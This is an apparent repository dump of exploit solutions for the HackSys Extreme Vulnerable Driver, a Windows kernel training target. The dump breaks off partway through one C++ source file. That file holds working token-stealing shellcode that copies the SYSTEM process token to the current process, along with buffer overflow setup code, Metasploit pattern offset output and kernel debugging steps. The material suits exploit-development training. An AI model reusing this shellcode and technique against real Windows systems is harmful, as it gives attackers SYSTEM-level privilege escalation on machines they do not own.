├── Exploit-StackOverflow
    ├── Debug
    │   ├── Exploit-StackOverflow.exe
    │   ├── Exploit-StackOverflow.ilk
    │   └── Exploit-StackOverflow.pdb
    ├── Exploit-StackOverflow.sln
    └── Exploit-StackOverflow
    │   ├── Debug
    │       ├── Exploit-.7E50BAF9.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── Exploit-StackOverflow.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── Exploit-StackOverflow.log
    │       ├── Exploit-StackOverflow.obj
    │       ├── Exploit-StackOverflow.pch
    │       ├── exploit-stackoverflow.obj.enc
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       └── vc141.pdb
    │   ├── Exploit-StackOverflow.cpp
    │   ├── Exploit-StackOverflow.vcxproj
    │   ├── Exploit-StackOverflow.vcxproj.filters
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── HEVD - Integer Overflow Exploit
    ├── Debug
    │   ├── HEVD - Integer Overflow Exploit.exe
    │   ├── HEVD - Integer Overflow Exploit.ilk
    │   └── HEVD - Integer Overflow Exploit.pdb
    ├── HEVD - Integer Overflow Exploit.sln
    └── HEVD - Integer Overflow Exploit
    │   ├── Debug
    │       ├── HEVD - I.0E8499B0.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── HEVD - Integer Overflow Exploit.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── HEVD - Integer Overflow Exploit.log
    │       ├── HEVD - Integer Overflow Exploit.obj
    │       ├── HEVD - Integer Overflow Exploit.pch
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       └── vc141.pdb
    │   ├── HEVD - Integer Overflow Exploit.cpp
    │   ├── HEVD - Integer Overflow Exploit.vcxproj
    │   ├── HEVD - Integer Overflow Exploit.vcxproj.filters
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit
    ├── HEVD-GDI-Bitmap-Exploit.sln
    ├── HEVD-GDI-Bitmap-Exploit
    │   ├── Debug
    │   │   ├── HEVD-GDI-Bitmap-Exploit.log
    │   │   ├── HEVD-GDI-Bitmap-Exploit.obj
    │   │   ├── HEVD-GDI-Bitmap-Exploit.pch
    │   │   ├── HEVD-GDI.21A858B1.tlog
    │   │   │   ├── CL.command.1.tlog
    │   │   │   ├── CL.read.1.tlog
    │   │   │   ├── CL.write.1.tlog
    │   │   │   ├── HEVD-GDI-Bitmap-Exploit.lastbuildstate
    │   │   │   ├── link.command.1.tlog
    │   │   │   ├── link.read.1.tlog
    │   │   │   └── link.write.1.tlog
    │   │   ├── stdafx.obj
    │   │   ├── vc141.idb
    │   │   └── vc141.pdb
    │   ├── HEVD-GDI-Bitmap-Exploit.cpp
    │   ├── HEVD-GDI-Bitmap-Exploit.vcxproj
    │   ├── HEVD-GDI-Bitmap-Exploit.vcxproj.filters
    │   ├── HEVD-GDI-Bitmap-Exploit.vcxproj.user
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   ├── targetver.h
    │   └── x64
    │   │   └── Debug
    │   │       ├── HEVD-GDI-Bitmap-Exploit.log
    │   │       ├── HEVD-GDI-Bitmap-Exploit.obj
    │   │       ├── HEVD-GDI-Bitmap-Exploit.pch
    │   │       ├── HEVD-GDI.21A858B1.tlog
    │   │           ├── CL.command.1.tlog
    │   │           ├── CL.read.1.tlog
    │   │           ├── CL.write.1.tlog
    │   │           ├── HEVD-GDI-Bitmap-Exploit.lastbuildstate
    │   │           ├── link.command.1.tlog
    │   │           ├── link.read.1.tlog
    │   │           └── link.write.1.tlog
    │   │       ├── hevd-gdi-bitmap-exploit.obj.enc
    │   │       ├── stdafx.obj
    │   │       ├── vc141.idb
    │   │       └── vc141.pdb
    └── x64
    │   └── Debug
    │       ├── HEVD-GDI-Bitmap-Exploit.exe
    │       ├── HEVD-GDI-Bitmap-Exploit.ilk
    │       └── HEVD-GDI-Bitmap-Exploit.pdb
├── HEVD-Null-Pointer
    ├── Debug
    │   ├── HEVD-Null-Pointer.exe
    │   ├── HEVD-Null-Pointer.ilk
    │   └── HEVD-Null-Pointer.pdb
    ├── HEVD-Null-Pointer.sln
    └── HEVD-Null-Pointer
    │   ├── Debug
    │       ├── HEVD-Nul.7A87B03E.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── HEVD-Null-Pointer.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── HEVD-Null-Pointer.Build.CppClean.log
    │       ├── HEVD-Null-Pointer.log
    │       ├── HEVD-Null-Pointer.obj
    │       ├── HEVD-Null-Pointer.pch
    │       ├── hevd-null-pointer.obj.enc
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       └── vc141.pdb
    │   ├── HEVD-Null-Pointer.cpp
    │   ├── HEVD-Null-Pointer.vcxproj
    │   ├── HEVD-Null-Pointer.vcxproj.filters
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── HEVD-Pool-Overflow
    ├── Debug
    │   ├── HEVD-Pool-Overflow.exe
    │   ├── HEVD-Pool-Overflow.ilk
    │   └── HEVD-Pool-Overflow.pdb
    ├── HEVD-Pool-Overflow.sln
    └── HEVD-Pool-Overflow
    │   ├── Debug
    │       ├── HEVD-Poo.91D3A0DB.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── HEVD-Pool-Overflow.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── HEVD-Pool-Overflow.log
    │       ├── HEVD-Pool-Overflow.obj
    │       ├── HEVD-Pool-Overflow.pch
    │       ├── hevd-pool-overflow.obj.enc
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       └── vc141.pdb
    │   ├── HEVD-Pool-Overflow.cpp
    │   ├── HEVD-Pool-Overflow.vcxproj
    │   ├── HEVD-Pool-Overflow.vcxproj.filters
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── HEVD-UaF-Exploit
    ├── Debug
    │   ├── HEVD-UaF-Exploit.exe
    │   ├── HEVD-UaF-Exploit.ilk
    │   └── HEVD-UaF-Exploit.pdb
    ├── HEVD-UaF-Exploit.sln
    └── HEVD-UaF-Exploit
    │   ├── Debug
    │       ├── HEVD-UaF-Exploit.log
    │       ├── HEVD-UaF-Exploit.obj
    │       ├── HEVD-UaF-Exploit.pch
    │       ├── HEVD-UaF-Exploit.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── HEVD-UaF-Exploit.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       └── vc141.pdb
    │   ├── HEVD-UaF-Exploit.cpp
    │   ├── HEVD-UaF-Exploit.vcxproj
    │   ├── HEVD-UaF-Exploit.vcxproj.filters
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── HEVD-Unitialized-Stack-Variable
    ├── Debug
    │   ├── HEVD-Unitialized-Stack-Variable.exe
    │   ├── HEVD-Unitialized-Stack-Variable.ilk
    │   └── HEVD-Unitialized-Stack-Variable.pdb
    ├── HEVD-Unitialized-Stack-Variable.sln
    └── HEVD-Unitialized-Stack-Variable
    │   ├── Debug
    │       ├── HEVD-Uni.751E06F3.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── HEVD-Unitialized-Stack-Variable.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── HEVD-Unitialized-Stack-Variable.log
    │       ├── HEVD-Unitialized-Stack-Variable.obj
    │       ├── HEVD-Unitialized-Stack-Variable.pch
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       └── vc141.pdb
    │   ├── HEVD-Unitialized-Stack-Variable.cpp
    │   ├── HEVD-Unitialized-Stack-Variable.vcxproj
    │   ├── HEVD-Unitialized-Stack-Variable.vcxproj.filters
    │   ├── ReadMe.txt
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── HEVD-WriteWhatWhere-Exploit
    ├── Debug
    │   ├── WriteWhatWhere-Exploit.exe
    │   ├── WriteWhatWhere-Exploit.ilk
    │   └── WriteWhatWhere-Exploit.pdb
    ├── WriteWhatWhere-Exploit.sln
    └── WriteWhatWhere-Exploit
    │   ├── Debug
    │       ├── WriteWha.27C6C108.tlog
    │       │   ├── CL.command.1.tlog
    │       │   ├── CL.read.1.tlog
    │       │   ├── CL.write.1.tlog
    │       │   ├── WriteWhatWhere-Exploit.lastbuildstate
    │       │   ├── link.command.1.tlog
    │       │   ├── link.read.1.tlog
    │       │   └── link.write.1.tlog
    │       ├── WriteWhatWhere-Exploit.log
    │       ├── WriteWhatWhere-Exploit.obj
    │       ├── WriteWhatWhere-Exploit.pch
    │       ├── stdafx.obj
    │       ├── vc141.idb
    │       ├── vc141.pdb
    │       └── writewhatwhere-exploit.obj.enc
    │   ├── ReadMe.txt
    │   ├── WriteWhatWhere-Exploit.cpp
    │   ├── WriteWhatWhere-Exploit.vcxproj
    │   ├── WriteWhatWhere-Exploit.vcxproj.filters
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   └── targetver.h
├── LICENSE
├── README.md
├── Viewing Debug Messages.txt
└── Windows 10 Kernel Debugging Setup.txt


/Exploit-StackOverflow/Debug/Exploit-StackOverflow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Debug/Exploit-StackOverflow.exe


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Debug/Exploit-StackOverflow.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Debug/Exploit-StackOverflow.pdb


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Exploit-StackOverflow", "Exploit-StackOverflow\Exploit-StackOverflow.vcxproj", "{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Debug|x64.Build.0 = Debug|x64
18 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Debug|x86.Build.0 = Debug|Win32
20 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Release|x64.ActiveCfg = Release|x64
21 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Release|x64.Build.0 = Release|x64
22 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Release|x86.ActiveCfg = Release|Win32
23 | 		{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/Exploit-StackOverflow.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\Exploit-StackOverflow\|
3 | 


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-.7E50BAF9.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-StackOverflow.log:
--------------------------------------------------------------------------------
1 |   Exploit-StackOverflow.cpp
2 | c:\users\gwilcox\documents\visual studio 2017\projects\exploit-stackoverflow\exploit-stackoverflow\exploit-stackoverflow.cpp(27): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'HANDLE'
3 |   Exploit-StackOverflow.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\Exploit-StackOverflow\Debug\Exploit-StackOverflow.exe
4 |   Exploit-StackOverflow.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\Exploit-StackOverflow\Debug\Exploit-StackOverflow.pdb (Partial PDB)
5 | 


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-StackOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-StackOverflow.obj


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-StackOverflow.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/Exploit-StackOverflow.pch


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/exploit-stackoverflow.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/exploit-stackoverflow.obj.enc


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/stdafx.obj


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/vc141.idb


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/Exploit-StackOverflow/Exploit-StackOverflow/Debug/vc141.pdb


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Exploit-StackOverflow.cpp:
--------------------------------------------------------------------------------
  1 | #include "stdafx.h"
  2 | #include "windows.h"
  3 | // These aren't used but heck I'll just add them so the shellcode later makes more sense.
  4 | #define KTHREAD_OFFSET     0x124  // nt!_KPCR.PcrbData.CurrentThread
  5 | #define EPROCESS_OFFSET    0x050  // nt!_KTHREAD.ApcState.Process
  6 | #define PID_OFFSET         0x0B4  // nt!_EPROCESS.UniqueProcessId
  7 | #define FLINK_OFFSET       0x0B8  // nt!_EPROCESS.ActiveProcessLinks.Flink
  8 | #define TOKEN_OFFSET       0x0F8  // nt!_EPROCESS.Token
  9 | #define SYSTEM_PID 0x004 // SYSTEM Process PID
 10 | int main()
 11 | {
 12 | 	printf("Starting the exploit!\r\n");
 13 | 	printf("Calling CreateFile to get handle to file.\r\n");
 14 | 
 15 | 	/*
 16 | 	Can determine the device name from the DriverEntry procedure which calls IoCreateDevice. In here we can see the string variable
 17 | 	aDeviceHacksyse which is set to "\Device\HackSysExtremeVulnerableDriver"
 18 | 	*/
 19 | 	HANDLE driverHandle = CreateFileA("\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);
 20 | 
 21 | 	if (driverHandle == INVALID_HANDLE_VALUE) {
 22 | 		printf("Unable to get a handle to the HEVD driver :(\r\n");
 23 | 		return 1;
 24 | 	}
 25 | 	else {
 26 | 		printf("Got handle to driver!\r\n");
 27 | 		printf("Handle: %i\r\n", driverHandle);
 28 | 
 29 | 		printf("Allocating shellcode....\r\n");
 30 | 		char shellcode[70] = (
 31 | 			"\x60" // PUSHAD
 32 | 			"\x64\xA1\x24\x01\x00\x00" // MOV EAX, fs:[KTHREAD_OFFSET]
 33 | 			"\x8B\x40\x50" // MOV EAX, [EAX + EPROCESS_OFFSET]
 34 | 			"\x89\xC1" // mov ecx, eax (Current EPROCESS structure)
 35 | 			"\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET]
 36 | 			// #---[Copy System PID token]
 37 | 			"\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID)
 38 | 			"\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-|
 39 | 			"\x2D\xB8\x00\x00\x00" //               sub eax, FLINK_OFFSET |
 40 | 			"\x39\x90\xB4\x00\x00\x00" //      cmp[eax + PID_OFFSET], edx |
 41 | 			"\x75\xED" // jnz                                          -> |
 42 | 			"\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET]
 43 | 			"\x89\x91\xF8\x00\x00\x00" // mov[ecx + TOKEN_OFFSET], edx
 44 | 			//#---[Recover]
 45 | 			"\x61" // popad
 46 | 			"\x31\xC0" // Set NTSTATUS->STATUS_SUCCESS so calling function thinks we exited successfully
 47 | 			/*
 48 | 			After call to triggeroverflow the code is expecting the function it returns to to execute
 49 | 				POP EBP
 50 | 				RET 8
 51 | 			so we emulate these instructions at the end of our shellcode so the program thinks our shellcode is
 52 | 			the function it is expecting to return to and the stack is all good :)
 53 | 
 54 | 			To check this, one can use the following steps:
 55 | 			1. Load up your VM with WinDBG attached in kernel debug mode.
 56 | 			2. Load up the driver with OSRLOADER.
 57 | 			2. In WinDBG, pause execution of the VM with the "Debug -> Break" menu option.
 58 | 			3. Type "lm" to list all loaded modules and then scroll down to the one named HEVD. Take note of the base address this is loaded at.
 59 | 			In the following example the base address were the driver code starts would be 97FC0000 and we can see that the last segment
 60 | 			of driver code starts at 97FC8000:
 61 | 			97fc0000 97fc8000   HEVD       (deferred)
 62 | 			4. Load the driver into IDA and then use "Edit -> Segments -> Rebase Program" and in the value section enter the base address you took note 
 63 | 			of earlier (in this case 0x97FC0000)
 64 | 			5. Click OK and scroll to the function or address you want to debug.
 65 | 			6. Take note of the address IDA says the instruction is at.
 66 | 			7. Open WinDBG, pause the kernel execution, and enter "bp *address noted earlier*.
 67 | 			8. Tada, WinDBG should now pause execution when the address is hit.
 68 | 			*/
 69 | 			"\x5D" // pop ebp
 70 | 			"\xC2\x08\x00" // ret 8
 71 | 		);
 72 | 		printf("Shellcode size: %i\r\n", sizeof(shellcode));
 73 | 		LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 74 | 		memcpy(shellcodeAddress, shellcode, sizeof(shellcode));
 75 | 		char buffer[0x824];
 76 | 		memset(buffer, '\x41', sizeof(buffer));
 77 | 		/*
 78 | 		root@kali:~*censored*# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2128
 79 | 		Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8C
 80 | 		root@kali:~*censored*# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 
 81 | 		[x] missing argument: No options set, try -h for usage
 82 | 		root@kali:~*censored*# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -h
 83 | 		Usage: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb [options]
 84 | 		Example: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q Aa3A
 85 | 		[*] Exact match at offset 9
 86 | 
 87 | 		Options:
 88 | 			-q, --query Aa0A                 Query to Locate
 89 | 			-l, --length <length>            The length of the pattern
 90 | 			-s, --sets <ABC,def,123>         Custom Pattern Sets
 91 | 			-h, --help                       Show this message
 92 | 		root@kali:~*censored*# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 72433372 -l 2128 
 93 | 		[*] Exact match at offset 2080
